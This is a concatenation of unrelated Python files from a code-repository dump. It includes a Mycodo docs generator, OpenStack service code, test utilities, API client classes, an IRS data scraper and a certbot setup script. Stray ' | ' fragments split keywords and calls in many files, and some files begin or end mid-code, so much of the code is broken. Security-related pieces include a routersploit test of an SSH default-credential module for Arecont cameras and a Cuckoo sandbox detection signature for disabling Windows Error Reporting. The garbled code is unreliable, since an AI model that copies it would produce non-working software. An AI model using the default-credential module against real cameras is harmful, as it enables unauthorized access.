from mycodo.config import INSTALL_DIRECTORY
from mycodo.utils.inputs import parse_input_information
from mycodo.databases.models import Measurement
from mycodo.databases.models import Unit
from mycodo.config import SQL_DATABASE_MYCODO
from mycodo.databases.utils import session_scope
MYCODO_DB_PATH = 'sqlite:///' + SQL_DATABASE_MYCODO
save_path = os.path.join(INSTALL_DIRECTORY, "docs/Supported-Inputs-By-Measurement.md")
inputs_info = OrderedDict()
mycodo_info = OrderedDict()
def repeat_to_length(s, wanted):
return (s * (wanted//len(s) + 1))[:wanted]
if __name__ == "__main__":
for input_id, input_data in parse_input_information(exclude_custom=True).items():
name_str = ""
if 'input_manufacturer' in input_data and input_data['input_manufacturer']:
name_str += "{}".format(input_data['input_manufacturer'])
if 'input_name' in input_data and input_data['input_name']:
name_str += ": {}".format(input_data['input_name'])
if 'measurements_name' in input_data and input_data['measurements_name']:
name_str += ": {}".format(input_data['measurements_name'])
if 'input_library' in input_data and input_data['input_library']:
name_str += ": {}".format(input_data['input_library'])
if name_str in inputs_info and 'dependencies_module' in inputs_info[name_str]:
# Multiple sets of dependencies, append library
inputs_info[name_str]['dependencies_module'].append(input_data['dependencies_module'])
else:
# Only one set of dependencies
inputs_info[name_str] = input_data
if 'dependencies_module' in input_data:
inputs_info[name_str]['dependencies_module'] = [input_data['dependencies_module']] # turn into list
inputs_info = dict(OrderedDict(sorted(inputs_info.items(), key = lambda t: t[0])))
with session_scope(MYCODO_DB_PATH) as new_session:
dict_measurements = add_custom_measurements(new_session.query(Measurement).all())
dict_units = add_custom_units(new_session.query(Unit).all())
dict_inputs = {}
for name, data in inputs_info.items():
if 'measurements_dict' not in data:
continue
for channel, measure in data['measurements_dict'].items():
if measure["measurement"]:
if measure["measurement"] not in dict_inputs:
dict_inputs[measure["measurement"]] = {}
dict_inputs[measure["measurement"]][name] = data
dict_inputs = dict(OrderedDict(sorted(dict_inputs.items(), key=lambda t: t[0])))
with open(save_path, 'w') as out_file:
# Table of contents
out_file.write("Measurements\n\n")
for measure, data in dict_inputs.items():
out_file.write(" - [{}](#{})\n".format(
dict_measurements[measure]["name"],
dict_measurements[measure]["name"]
.replace(" ", "-")
.replace("(", "")
.replace(")", "").lower()))
out_file.write("\n")
for measure, data in dict_inputs.items():
out_file.write("## {}\n\n".format(dict_measurements[measure]["name"]))
for each_name, each_data in data.items( | ):
name_str = ""
if 'input_manufacturer' in each_data and each_data['input_manufacturer']:
name_str += "{}".format(each_data['input_manufacturer'])
if 'input_name' in each_data and each_data['input_name']:
name_str += ": {}".format(each_data['input_name'])
link_str = name_str.lower()
link_str = link_str.replace(" ", "-").replace("(", "-").replace(")", | "-").replace(":", "-").replace(",", "-").replace("/", "-")
link_str = link_str.replace("--", "-").replace("--", "-").strip("-")
out_file.write("### [{}](/Mycodo/Supported-Inputs/#{})\n".format(name_str, link_str))
out_file.write("\n")
|
dasseclab/dasseclab | clones/routersploit/tests/creds/cameras/arecont/test_ssh_default_creds.py | Python | gpl-2.0 | 594 | 0.001684 | from routersploit.modules.creds.cameras.arecont.ssh_default_creds import Exploit
def test_check_success(target):
""" Test scenario - testing against SSH server """
| exploit = Exploit()
assert exploit.target == ""
assert exploit.port == 22
assert exploit.threads == 1
as | sert exploit.defaults == ["admin:", ":"]
assert exploit.stop_on_success is True
assert exploit.verbosity is True
exploit.target = target.host
exploit.port = target.port
assert exploit.check() is False
assert exploit.check_default() is None
assert exploit.run() is None
|
Mausy5043/bonediagd | DHT22/bonediagd_DHT/platform_detect.py | Python | mit | 1,586 | 0.002522 | # Copyright (c) 2014 Adafruit Industries
# Au | thor: Tony DiCola
# Modified by Mauy5043 (2016)
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the | Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# This is a direct copy of what's in the Adafruit Python GPIO library:
# https://raw.githubusercontent.com/adafruit/Adafruit_Python_GPIO/master/Adafruit_GPIO/Platform.py
# TODO: Add dependency on Adafruit Python GPIO and use its platform detect
# functions.
import platform
import re
# Platform identification constants.
UNKNOWN = 0
RASPBERRY_PI = 1
BEAGLEBONE_BLACK = 2
def platform_detect():
return BEAGLEBONE_BLACK
|
citrix-openstack-build/ironic | ironic/openstack/common/service.py | Python | apache-2.0 | 10,246 | 0 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# Copyright 2011 Justin Santa Barbara
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Generic Node base class for all workers that run on hosts."""
import errno
import os
import random
import signal
import sys
import time
import eventlet
import logging as std_logging
from oslo.config import cfg
from ironic.openstack.common import eventlet_backdoor
from ironic.openstack.common.gettextutils import _
from ironic.openstack.common import importutils
from ironic.openstack.common import log as logging
from ironic.openstack.common import threadgroup
rpc = importutils.try_import('ironic.openstack.common.rpc')
CONF = cfg.CONF
LOG = logging.getLogger(__name__)
class Launcher(object):
"""Launch one or more services and wait for them to complete."""
def __init__(self):
"""Initialize the service launcher.
:returns: None
"""
self._services = threadgroup.ThreadGroup()
self.backdoor_port = eventlet_backdoor.initialize_if_enabled()
@staticmethod
def run_service(service):
"""Start and wait for a service to finish.
:param service: service to run and wait for.
:returns: None
"""
service.start()
service.wait()
def launch_service( | self, service):
"""Load and start the given service.
:param service: The service you would like to start.
:returns: None
"""
service.backdoor_port = self.backdoor_port
self._services.add_thread(self.run_service, service)
def stop(self):
"""Stop all services which a | re currently running.
:returns: None
"""
self._services.stop()
def wait(self):
"""Waits until all services have been stopped, and then returns.
:returns: None
"""
self._services.wait()
class SignalExit(SystemExit):
def __init__(self, signo, exccode=1):
super(SignalExit, self).__init__(exccode)
self.signo = signo
class ServiceLauncher(Launcher):
def _handle_signal(self, signo, frame):
# Allow the process to be killed again and die from natural causes
signal.signal(signal.SIGTERM, signal.SIG_DFL)
signal.signal(signal.SIGINT, signal.SIG_DFL)
raise SignalExit(signo)
def wait(self):
signal.signal(signal.SIGTERM, self._handle_signal)
signal.signal(signal.SIGINT, self._handle_signal)
LOG.debug(_('Full set of CONF:'))
CONF.log_opt_values(LOG, std_logging.DEBUG)
status = None
try:
super(ServiceLauncher, self).wait()
except SignalExit as exc:
signame = {signal.SIGTERM: 'SIGTERM',
signal.SIGINT: 'SIGINT'}[exc.signo]
LOG.info(_('Caught %s, exiting'), signame)
status = exc.code
except SystemExit as exc:
status = exc.code
finally:
if rpc:
rpc.cleanup()
self.stop()
return status
class ServiceWrapper(object):
def __init__(self, service, workers):
self.service = service
self.workers = workers
self.children = set()
self.forktimes = []
class ProcessLauncher(object):
def __init__(self):
self.children = {}
self.sigcaught = None
self.running = True
rfd, self.writepipe = os.pipe()
self.readpipe = eventlet.greenio.GreenPipe(rfd, 'r')
signal.signal(signal.SIGTERM, self._handle_signal)
signal.signal(signal.SIGINT, self._handle_signal)
def _handle_signal(self, signo, frame):
self.sigcaught = signo
self.running = False
# Allow the process to be killed again and die from natural causes
signal.signal(signal.SIGTERM, signal.SIG_DFL)
signal.signal(signal.SIGINT, signal.SIG_DFL)
def _pipe_watcher(self):
# This will block until the write end is closed when the parent
# dies unexpectedly
self.readpipe.read()
LOG.info(_('Parent process has died unexpectedly, exiting'))
sys.exit(1)
def _child_process(self, service):
# Setup child signal handlers differently
def _sigterm(*args):
signal.signal(signal.SIGTERM, signal.SIG_DFL)
raise SignalExit(signal.SIGTERM)
signal.signal(signal.SIGTERM, _sigterm)
# Block SIGINT and let the parent send us a SIGTERM
signal.signal(signal.SIGINT, signal.SIG_IGN)
# Reopen the eventlet hub to make sure we don't share an epoll
# fd with parent and/or siblings, which would be bad
eventlet.hubs.use_hub()
# Close write to ensure only parent has it open
os.close(self.writepipe)
# Create greenthread to watch for parent to close pipe
eventlet.spawn_n(self._pipe_watcher)
# Reseed random number generator
random.seed()
launcher = Launcher()
launcher.run_service(service)
def _start_child(self, wrap):
if len(wrap.forktimes) > wrap.workers:
# Limit ourselves to one process a second (over the period of
# number of workers * 1 second). This will allow workers to
# start up quickly but ensure we don't fork off children that
# die instantly too quickly.
if time.time() - wrap.forktimes[0] < wrap.workers:
LOG.info(_('Forking too fast, sleeping'))
time.sleep(1)
wrap.forktimes.pop(0)
wrap.forktimes.append(time.time())
pid = os.fork()
if pid == 0:
# NOTE(johannes): All exceptions are caught to ensure this
# doesn't fallback into the loop spawning children. It would
# be bad for a child to spawn more children.
status = 0
try:
self._child_process(wrap.service)
except SignalExit as exc:
signame = {signal.SIGTERM: 'SIGTERM',
signal.SIGINT: 'SIGINT'}[exc.signo]
LOG.info(_('Caught %s, exiting'), signame)
status = exc.code
except SystemExit as exc:
status = exc.code
except BaseException:
LOG.exception(_('Unhandled exception'))
status = 2
finally:
wrap.service.stop()
os._exit(status)
LOG.info(_('Started child %d'), pid)
wrap.children.add(pid)
self.children[pid] = wrap
return pid
def launch_service(self, service, workers=1):
wrap = ServiceWrapper(service, workers)
LOG.info(_('Starting %d workers'), wrap.workers)
while self.running and len(wrap.children) < wrap.workers:
self._start_child(wrap)
def _wait_child(self):
try:
# Don't block if no child processes have exited
pid, status = os.waitpid(0, os.WNOHANG)
if not pid:
return None
except OSError as exc:
if exc.errno not in (errno.EINTR, errno.ECHILD):
raise
return None
if os.WIFSIGNALED(status):
sig = os.WTERMSIG(status)
LOG.info(_('Child %(pid)d killed by signal %(sig)d'),
dict(pid=pid, sig=sig))
else:
code = os.WEXITSTATUS(status)
LOG.info(_('Child %(pid)s exited with status %(code)d'),
|
PawarPawan/h2o-v3 | h2o-py/tests/testdir_algos/kmeans/pyunit_ozoneKmeans.py | Python | apache-2.0 | 589 | 0.03056 | imp | ort sys
sys.path.insert(1, " | ../../../")
import h2o
def ozoneKM(ip, port):
# Connect to a pre-existing cluster
# connect to localhost:54321
train = h2o.import_file(path=h2o.locate("smalldata/glm_test/ozone.csv"))
# See that the data is ready
print train.describe()
# Run KMeans
my_km = h2o.kmeans(x=train,
k=10,
init = "PlusPlus",
max_iterations = 100)
my_km.show()
my_km.summary()
my_pred = my_km.predict(train)
my_pred.describe()
if __name__ == "__main__":
h2o.run_test(sys.argv, ozoneKM)
|
antong/ldaptor | ldaptor/test/util.py | Python | lgpl-2.1 | 4,431 | 0.003611 | from twisted.python import failure
from twisted.internet import reactor, protocol, address, error
from twisted.test import testutils
from twisted.trial import unittest
from StringIO import StringIO
class FakeTransport(protocol.FileWrapper):
disconnecting = False
disconnect_done = False
def __init__(self, addr, peerAddr):
self.data = StringIO()
protocol.FileWrapper.__init__(self, self.data)
self.addr = addr
self.peerAddr = peerAddr
def getHost(self):
return self.addr
def getPeer(self):
return self.peerAddr
def loseConnection(self):
self.disconnecting = True
class FasterIOPump(testutils.IOPump):
def pump(self):
"""Move data back and forth.
Returns whether any data was moved.
"""
self.clientIO.seek(0)
self.serverIO.seek( | 0)
cData = self.clientIO.read()
sD | ata = self.serverIO.read()
self.clientIO.seek(0)
self.serverIO.seek(0)
self.clientIO.truncate()
self.serverIO.truncate()
self.server.dataReceived(cData)
self.client.dataReceived(sData)
if cData or sData:
return 1
else:
return 0
class IOPump(FasterIOPump):
active = []
def __init__(self,
client, server,
clientTransport, serverTransport):
self.clientTransport = clientTransport
self.serverTransport = serverTransport
testutils.IOPump.__init__(self,
client=client,
server=server,
clientIO=clientTransport.data,
serverIO=serverTransport.data)
self.active.append(self)
def pump(self):
FasterIOPump.pump(self)
if (self.clientTransport.disconnecting
and not self.clientTransport.data.getvalue()
and not self.clientTransport.disconnect_done):
self.server.connectionLost(error.ConnectionDone)
self.clientTransport.disconnect_done = True
if (self.serverTransport.disconnecting
and not self.serverTransport.data.getvalue()
and not self.serverTransport.disconnect_done):
self.client.connectionLost(error.ConnectionDone)
self.serverTransport.disconnect_done = True
if (self.clientTransport.disconnect_done
and self.serverTransport.disconnect_done):
self.active.remove(self)
def __repr__(self):
return '<%s client=%r/%r server=%r/%r>' % (
self.__class__.__name__,
self.client,
self.clientIO.getvalue(),
self.server,
self.serverIO.getvalue(),
)
def returnConnected(server, client,
clientAddress=None,
serverAddress=None):
"""Take two Protocol instances and connect them.
"""
if serverAddress is None:
serverAddress = address.IPv4Address('TCP', 'localhost', 1)
if clientAddress is None:
clientAddress = address.IPv4Address('TCP', 'localhost', 2)
clientTransport = FakeTransport(clientAddress, serverAddress)
client.makeConnection(clientTransport)
serverTransport = FakeTransport(serverAddress, clientAddress)
server.makeConnection(serverTransport)
pump = IOPump(client, server,
clientTransport,
serverTransport)
# Challenge-response authentication:
pump.flush()
# Uh...
pump.flush()
return pump
def _append(result, lst):
lst.append(result)
def _getDeferredResult(d, timeout=None):
if timeout is not None:
d.setTimeout(timeout)
resultSet = []
d.addBoth(_append, resultSet)
while not resultSet:
for pump in IOPump.active:
pump.pump()
reactor.iterate()
return resultSet[0]
def pumpingDeferredResult(d, timeout=None):
result = _getDeferredResult(d, timeout)
if isinstance(result, failure.Failure):
if result.tb:
raise result.value.__class__, result.value, result.tb
raise result.value
else:
return result
def pumpingDeferredError(d, timeout=None):
result = _getDeferredResult(d, timeout)
if isinstance(result, failure.Failure):
return result
else:
raise unittest.FailTest, "Deferred did not fail: %r" % (result,)
|
tomachalek/kontext | lib/plugins/abstract/issue_reporting.py | Python | gpl-2.0 | 1,501 | 0.000666 | # Copyright (c) 2017 Charles University, Faculty | of Arts,
# Institute of the Czech National Corpus
# Copyright (c) 2017 Tomas Machalek <tomas.machalek@gmail.com>
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; version 2
# dated June, | 1991.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
class IssueReportingAction(object):
def to_dict(self):
return self.__dict__
class DynamicReportingAction(IssueReportingAction):
def __init__(self):
self.type = 'dynamic'
class StaticReportingAction(IssueReportingAction):
def __init__(self, url, args, label, blank_window):
self.url = url
self.args = args
self.label = label
self.blank_window = blank_window
self.type = 'static'
class AbstractIssueReporting(object):
def export_report_action(self, plugin_api):
raise NotImplementedError()
def submit(self, plugin_api, args):
raise NotImplementedError()
|
kaze/paasmaker | paasmaker/common/api/application.py | Python | mpl-2.0 | 4,363 | 0.028879 | #
# Paasmaker - Platform as a Service
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
#
import loggin | g
import paasmaker
from apirequest import APIRequest, APIResponse
logger = logging.getLogger(__name__)
logger.addHandler(logging.NullHandler())
class ApplicationGetAPIRequest(APIRequest):
"""
Get the details for a single application.
"""
def __init__(self, *args, **kwargs):
super(ApplicationGetAPIRequest, self).__init__(*args, | **kwargs)
self.application_id = None
self.method = 'GET'
def set_application(self, application_id):
"""
Set the application ID for the request.
"""
self.application_id = application_id
def get_endpoint(self):
return '/application/%d' % self.application_id
class ApplicationListAPIRequest(APIRequest):
"""
List applications in a workspace.
"""
def __init__(self, *args, **kwargs):
super(ApplicationListAPIRequest, self).__init__(*args, **kwargs)
self.workspace_id = None
self.method = 'GET'
def set_workspace(self, workspace_id):
"""
Set the workspace ID to list the applications for.
"""
self.workspace_id = workspace_id
def get_endpoint(self):
return '/workspace/%d/applications' % self.workspace_id
class ApplicationNewAPIRequest(APIRequest):
"""
Create a new application.
"""
def __init__(self, *args, **kwargs):
self.params = {}
self.params['manifest_path'] = 'manifest.yml'
self.params['parameters'] = {}
self.workspace_id = None
super(ApplicationNewAPIRequest, self).__init__(*args, **kwargs)
def set_workspace(self, workspace_id):
"""
Set the workspace that this application belongs in.
"""
self.workspace_id = workspace_id
def set_uploaded_file(self, unique_identifier):
"""
If the source for this new version is an uploaded file,
this function sets the unique server-generated file
identifier for this version.
"""
self.params['uploaded_file'] = unique_identifier
def set_scm(self, scm):
"""
Set the SCM name for this new version.
"""
self.params['scm'] = scm
def set_parameters(self, parameters):
"""
Set the SCM parameters for this new version.
"""
self.params['parameters'] = parameters
def set_manifest_path(self, manifest_path):
"""
Set the manifest path inside the files. Defaults to ``manifest.yml``.
"""
self.params['manifest_path'] = manifest_path
def build_payload(self):
return self.params
def get_endpoint(self):
return '/workspace/%d/applications/new' % self.workspace_id
class ApplicationNewVersionAPIRequest(APIRequest):
"""
Create a new version of an existing application.
"""
def __init__(self, *args, **kwargs):
self.params = {}
self.params['manifest_path'] = 'manifest.yml'
self.params['parameters'] = {}
self.application_id = None
super(ApplicationNewVersionAPIRequest, self).__init__(*args, **kwargs)
def set_application(self, application_id):
"""
Set the application ID to create a new version for.
"""
self.application_id = application_id
def set_uploaded_file(self, unique_identifier):
"""
If the source for this new version is an uploaded file,
this function sets the unique server-generated file
identifier for this version.
"""
self.params['uploaded_file'] = unique_identifier
def set_scm(self, scm):
"""
Set the SCM name for this new version.
"""
self.params['scm'] = scm
def set_parameters(self, parameters):
"""
Set the SCM parameters for this new version.
"""
self.params['parameters'] = parameters
def set_manifest_path(self, manifest_path):
"""
Set the manifest path inside the files. Defaults to ``manifest.yml``.
"""
self.params['manifest_path'] = manifest_path
def build_payload(self):
return self.params
def get_endpoint(self):
return '/application/%d/newversion' % self.application_id
class ApplicationDeleteAPIRequest(APIRequest):
"""
Deletes an application.
"""
def __init__(self, *args, **kwargs):
super(ApplicationDeleteAPIRequest, self).__init__(*args, **kwargs)
self.application_id = None
def set_application(self, application_id):
"""
Set the application ID for the request.
"""
self.application_id = application_id
def get_endpoint(self):
return '/application/%d/delete' % self.application_id
|
ktok07b6/polyphony | tests/error/loop_var01.py | Python | mit | 222 | 0.004505 | #Using the variable 'i' is restricted by polyphony's name scope rule
from polyphony im | port testbench
def loop_var01():
for i in range(10):
| pass
return i
@testbench
def test():
loop_var01()
test()
|
jirikuncar/kwalitee | kwalitee/wsgi.py | Python | gpl-2.0 | 1,154 | 0 | # -*- coding: utf-8 -*-
#
# This file is part of kwalitee
# Copyright (C) 2014, 2015 CERN.
#
# kwalitee is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# kwalitee is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPO | SE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with kwalitee; if not, write to the Free Software Foundation,
# Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
#
# In applying this lic | ence, CERN does not waive the privileges and immunities
# granted to it by virtue of its status as an Intergovernmental Organization
# or submit itself to any jurisdiction.
"""WSGI application with debug middleware if in debug mode."""
from __future__ import absolute_import
from kwalitee import create_app
application = create_app("kwalitee")
|
lneuhaus/pyrpl | pyrpl/hardware_modules/ams.py | Python | gpl-3.0 | 859 | 0.002328 | from ..modules import HardwareModule
from ..attributes import PWMRegister
class AMS(HardwareModule):
"""mostly deprecated module (redpitaya has removed adc support).
only here for dac2 and dac3"""
addr_base = 0x40400000
# attention: writing to dac0 and dac1 has no effect
# only write to dac2 and 3 to set output voltages
# to modify dac0 and dac1, connect a r.pwm0.input='pid0'
# and let the pid module determine the voltage
dac0 = PW | MRegister(0x20, doc="PWM output 0 [V]")
dac1 = PWMRegister(0x24, doc="PWM output 1 [V]")
dac2 = PWMRegister(0x28, doc="PWM output 2 [V]")
dac3 = PWMRegister(0x2C, doc="PWM output 3 [V]")
def _setup(self): # the function is here for its docstring to be used by the metaclass.
"""
sets up the AMS (just setting the attributes is OK)
"""
pass
| |
Algomorph/nyc-data-exploration | scraping/irs_tables/irs_table_scraper.py | Python | apache-2.0 | 6,902 | 0.012315 | #!/usr/bin/env python
# encoding: utf-8
'''
irs_table_scraper -- scrapes IRS data from www.melissadata.com for given zips
irs_table_scraper is a python script that reads in a list of zips and scrapes the
IRS data for those scrips from www.melissadata.com
@author: Gregory Kramida
@copyright: 2013 Gregory Kramida and Jonathan Gluck. All rights reserved.
@license: Apache License 2.0
@contact: GitHub: Algomorph
@deffield updated: Updated
'''
import sys
import os
import re
import tablescrape as tsc
import numpy as np
import time
from argparse import ArgumentParser
from argparse import RawDescriptionHelpFormatter
__all__ = []
__version__ = 0.1
__date__ = '2013-10-03'
__updated__ = '2013-10-03'
DEBUG = 1
TESTRUN = 0
PROFILE = 0
class CLIError(Exception):
'''Generic exception to raise and log different fatal errors.'''
def __init__(self, msg):
super(CLIError).__init__(type(self))
self.msg = "E: %s" % msg
def __str__(self):
return self.msg
def __unicode__(self):
return self.msg
def main(argv=None): # IGNORE:C0111
'''Command line options.'''
if argv is None:
argv = sys.argv
else:
sys.argv.extend(argv)
program_name = os.path.basename(sys.argv[0])
program_version = "v%s" % __version__
program_build_date = str(__updated__)
program_version_message = '%%(prog)s %s (%s)' % (program_version, program_build_date)
program_shortdesc = __import__('__main__').__doc__.split("\n")[1]
program_license = '''%s
Created by algomorph on %s.
Copyright 2013 Gregory Kramida and Jonathan Gluck. All rights reserved.
Licensed under the Apache License 2.0
http://www.apache.org/licenses/LICENSE-2.0
Distributed on an "AS IS" basis without warranties
or conditions of any kind, either express or implied.
USAGE
''' % (program_shortdesc, str(__date__))
try:
# Setup argument parser
parser = ArgumentParser(description=program_license, formatter_class=RawDescriptionHelpFormatter)
parser.add_argument("-v", "--verbose",default=0,type=int, dest="verbose", help="set verbosity level [default: %(default)s]")
parser.add_argument('-V', '--version', action='version', version=program_version_message)
parser.add_argument('-z', "--zip_codes",default="zip_codes.csv",dest="zip_codes", help="Path to the file containing 5-digit zip codes in a single column.")
parser.add_argument('-n', "--num_zips",type=int,default=500000, help="Total number of zip code areas to process")
parser.add_argument('-o', "--output",default="zip_income.csv", help="Path to the output csv file. Existing file will be overwritten.")
parser.add_argument('-e', "--error_file",default="errors.csv", help="Path to the error csv file. Existing file will be overwritten.")
# Process arguments
args = parser.parse_args()
verbose = args.verbose
zip_path = args.zip_codes
out_path = args.output
err_path = args.error_file
if verbose > 0:
print("Verbose mode on")
if(not os.path.isfile(zip_path)):
raise CLIError("Could not find text file at " % zip_path)
#read zips
f = open(zip_path);
zips = sorted(f.readlines());
f.close()
#find proper upper bound
n_zips = min(len(zips),args.num_zips)
#prepare data structure for output
n_years = 11
first_year = 2000
out_arr = np.empty((n_zips*n_years,19),dtype=np.int32)
tcell_regex = re.compile('td|th')
cell_format_regex = re.compile('%|\$|,')
i_out_row = 0
errors = []
for i_zip in xrange(0,n_zips):
szip = zips[i_zip].rstrip()
if(verbose > 0):
print "Processing zip %s, %d of %d" % (szip, i_zip, n_zips)
url = "http://www.melissadata.com/lookups/TaxZip.asp?Zip="+szip+"&submit1=Submit"
soup = tsc.opensoup(url)
tables = soup.findAll("table")
table = tables[5]
#skip first two rows - table header and year column headers
| #also skip last row - footer
rows = table.findAll('tr')
if(len(rows) != 24):
if verbose > 0:
print "Missing data for zip %s" % szip
continue
rows = rows[2:19]
#prep the first 10 rows
out_arr[i_out_row:i_out_row+n_years,0] = [int(szip)]*n_years #zip goes in first col
out_arr[i_out_row:i_out_row+n_years,1] = range(first_year,first_year + n_years) #years go in second col
| i_out_col = 2
for row in rows:
#skip first cell (row header)
cells = row.findAll(tcell_regex)[1:]
i_year = 0
for cell in cells:
#strip tags, $, %, and remove commas
str_cell = cell_format_regex.sub("",tsc.striptags(cell.renderContents()))
if(str_cell != "N/A"):
try:
out_arr[i_out_row+i_year,i_out_col] = int(str_cell)
except ValueError, ve:
out_arr[i_out_row+i_year,i_out_col] = -1000000
errors.append([int(szip), first_year + i_year, i_out_col])
pass #don't
else:
out_arr[i_out_row+i_year,i_out_col] = -999999
i_year +=1
i_out_col+=1
i_out_row += n_years
time.sleep(1)
#store output
np.savetxt(out_path, out_arr, delimiter = ",", fmt='%d')
np.savetxt(err_path, np.asarray(errors,dtype=np.int32), delimiter = ",", fmt='%d')
return 0
except KeyboardInterrupt:
### handle keyboard interrupt ###
return 0
'''
except Exception, e:
if DEBUG or TESTRUN:
raise(e)
indent = len(program_name) * " "
sys.stderr.write(program_name + ": " + repr(e) + "\n")
sys.stderr.write(indent + " for help use --help")
return 2
'''
if __name__ == "__main__":
if DEBUG:
sys.argv.append("-v=1")
if TESTRUN:
import doctest
doctest.testmod()
if PROFILE:
import cProfile
import pstats
profile_filename = 'irs_table_scraper_profile.txt'
cProfile.run('main()', profile_filename)
statsfile = open("profile_stats.txt", "wb")
p = pstats.Stats(profile_filename, stream=statsfile)
stats = p.strip_dirs().sort_stats('cumulative')
stats.print_stats()
statsfile.close()
sys.exit(0)
sys.exit(main())
|
lixiangning888/whole_project | modules/signatures_orignal/disables_wer.py | Python | lgpl-3.0 | 645 | 0.003101 | # Copyright (C) 2015 Kevin Ross
# This file is part of Cuckoo Sandbox - http://www.cuckoosandbox.org
# See the file 'docs/LICENSE' for copying permission.
from lib.cuckoo.common.abstracts import Signature
class DisablesWER(Signature):
name = "disables_wer"
description = "Attempts to disable Windows Error Reporting"
severity = 3
categories = ["stealth | "]
authors = ["Kevin Ross"]
minimum = "1.2"
def run(self):
| if self.check_write_key(pattern=".*\\\\SOFTWARE\\\\(Wow6432Node\\\\)?Microsoft\\\\Windows\\\\Windows\\ Error\\ Reporting\\\\Disabled$", regex=True):
return True
return False
|
jsha/letsencrypt | certbot-apache/setup.py | Python | apache-2.0 | 2,131 | 0 | import sys
from setuptools import setup
from setuptools import find_packages
version = '0.20.0.dev0'
# Please update tox.ini when modifying dependency version requirements
install_requires = [
'acme=={0}'.format(version),
'certbot=={0}'.format(version),
'mock',
'python-augeas',
# For pkg_resources. >=1.0 so pip resolves it to a version cryptography
# will tolerate; see #2599:
'setuptools>=1.0',
'zope.component',
'zope.interface',
]
docs_extras = [
'Sphinx>=1.0', # autodoc_member_order = 'bysource', autodoc_default_flags
'sphinx_rtd_theme',
]
setup(
name='certbot-apache',
version=version,
description="Apache plugin for Certbot",
url='https://github.com/letsencrypt/letsencrypt',
author="Certbot Project",
author_email='client-dev@letsencrypt.org',
license='Apache License 2.0',
classifiers=[
'Development Status :: 3 - Alpha',
'Environment :: Plugins',
'Intended Audience :: System Administrators',
'License :: OSI Approved :: Apache Software License',
'Operating System :: POSIX :: Linux',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Topic :: Internet :: WWW/HTTP' | ,
'Topic :: Security',
'Topic :: System :: Installation/Setup',
'Topic :: System :: Networking',
'Topic :: System | :: Systems Administration',
'Topic :: Utilities',
],
packages=find_packages(),
include_package_data=True,
install_requires=install_requires,
extras_require={
'docs': docs_extras,
},
entry_points={
'certbot.plugins': [
'apache = certbot_apache.configurator:ApacheConfigurator',
],
},
test_suite='certbot_apache',
)
|
davy39/eric | Helpviewer/UserAgent/__init__.py | Python | gpl-3.0 | 169 | 0 | # -*- coding: utf-8 -*-
# Copyright (c) 20 | 10 - 2014 Detlev Offenbach <detlev@die-offenbachs.de>
#
"""
Package implementing a menu to select the user agent string.
"""
| |
gromitsun/sim-xrf-py | others/scatt_bg/scatt_bg_c.py | Python | mit | 1,042 | 0.03071 | import ctypes
import numpy as np
import os
libpath = os.path.dirname(os.path.realpath(__file__))
lib = ctypes.cdll.LoadLibr | ary(libpath+'\libscatt_bg.so')
scatt_bg_c = lib.scatt_bg
scatt_bg_c.restype = ctypes.c_void_p # reset return types. default is c_int
scatt_bg_c.argtypes = [ctypes.c_double, ctypes.POINTER(ctypes.c_double), ctypes.c_int, ctypes.c_int]
subtend_c = lib.subtend
subtend_c.restype = ctypes.c_double # reset return types. default is c_int
subtend_c.argtypes = [ctypes.c_double, ctypes.c_double, ctypes.c_double, ctypes.c_double]
def scatt_bg(kev, | Z_max = 98, theta_max = 90):
# kev = np.asarray(kev)
out = np.zeros(Z_max*theta_max)
# Z_max = np.asarray(Z_max)
# theta_max = np.asarray(theta_max)
scatt_bg_c(ctypes.c_double(kev),out.ctypes.data_as(ctypes.POINTER(ctypes.c_double)),ctypes.c_int(Z_max),ctypes.c_int(theta_max))
return out
def subtend(theta0,theta1,beta0,beta1):
